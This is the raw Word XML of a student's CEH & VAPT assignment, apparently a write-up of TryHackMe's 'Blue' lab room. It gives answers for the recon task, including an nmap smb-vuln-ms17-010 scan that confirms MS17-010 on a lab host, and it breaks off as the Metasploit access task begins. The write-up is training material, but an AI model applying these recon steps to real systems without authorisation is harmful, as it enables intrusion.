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270" w:right="-270" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6738938" cy="1113965"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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738938" cy="1113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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Assignment - 02</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CEH &amp; VAPT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pP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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pP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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>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18">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Md Sayem Mottakee</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Roll:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4vt9vv1mc9qu" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TryHackMe Account:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2dsncgxsf5c3" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="1866900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>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172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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fblbwqk5zwyy" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal in Kali Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="1625600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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6172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172200" cy="800100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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172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spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w327f9u1lutk" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bfza80pzgayx" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cb4djymdx67f" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Room: Blue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1092200"/>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Rule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_j64hfosbwlgx" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hy7zia2l32pl" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 1: Recon</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan the machine. (If you are unsure how to tackle this, I recommend checking out the</w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nmap</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> room)</w:t>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b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="13335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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> How many ports are open with a port number under 1000?</w:t>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ans: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="11811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before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)</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ms17-010</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified that the target machine was running an outdated Windows 7 system, which is known to be susceptible to SMB vulnerabilities. To verify this, an Nmap scan was performed using the smb-vuln-ms17-010 script on port 445 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sT --script smb-vuln-ms17-010 -p445 10.49.187.132</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). The scan result confirmed that the host is vulnerable to MS17-010.</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jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="11811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181100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4424363" cy="212298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24363" cy="21229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after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xexiecpl05zm" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rfz8wqluptyj" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ylwn1rmwkez8" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 2: Gain Access</w:t>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spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Start</w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Metasploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
